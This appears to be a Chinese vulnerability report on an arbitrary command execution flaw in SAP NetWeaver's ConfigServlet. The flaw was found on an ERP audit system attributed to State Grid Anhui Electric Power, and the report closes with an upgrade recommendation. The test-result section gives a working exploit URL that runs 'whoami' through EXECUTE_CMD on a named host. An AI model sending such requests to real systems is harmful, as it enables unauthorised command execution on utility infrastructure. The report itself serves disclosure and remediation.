Sap NetWeaver任意命令执行漏洞

一、基本情况

漏洞分布:内网

漏洞级别:

漏洞类别:网页类

漏洞简述:ERP审计系统(http://ep.ah.sgcc.com.cn/irj/portal/)存在任意命令执行漏洞。

二、问题描述

系统名称

所属单位

访问地址

测试工具

ERP审计系统

国网安徽省电力公司

http://ep.ah.sgcc.com.cn/irj/portal/

手工测试

三、测试结果

通过手工测试找到漏洞地址:http://ahsjp.ah.sgcc.com.cn/ctc/servlet/ConfigServlet?param=com%2Esap%2Ectc%2Eutil%2EFileSystemConfig%3BEXECUTE_CMD%3BCMDLINE%3Dwhoami


四、整改建议

SAP Netweaver ConfigServlet文件存在命令执行漏洞,导致系统被入侵,SAP Netweaver 7.0及以前版本均受影响。

建议使用SAP Netweaver最新版本,下载路径:

http://help.sap.com/nw74

请使用浏览器的分享功能分享到微信等